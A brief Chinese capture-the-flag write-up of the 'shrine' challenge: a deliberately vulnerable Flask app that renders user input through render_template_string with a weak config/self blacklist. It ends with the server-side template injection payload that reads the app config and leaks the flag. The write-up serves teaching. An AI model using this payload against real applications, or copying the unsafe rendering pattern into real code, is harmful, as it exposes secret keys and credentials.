给了一段源码,格式化代码如下
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG') \
@app.route('/')
def index():
return open(__file__).read() \
@app.route('/shrine/')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
模板注入参考文献
根据参考文献
可以发现他用了这个函数,测试一下是否存在模板注入
可以发现存在模板注入,源码中有个名字为FLAG的config
但是源码中又过滤了config
百度搜搜过滤config怎么做~~(日常白嫖)~~
参考文献
根据参考文献
最终得出payload
/shrine/{{url_for.__globals__['current_app'].config}}
最终得到FLAG的配置文件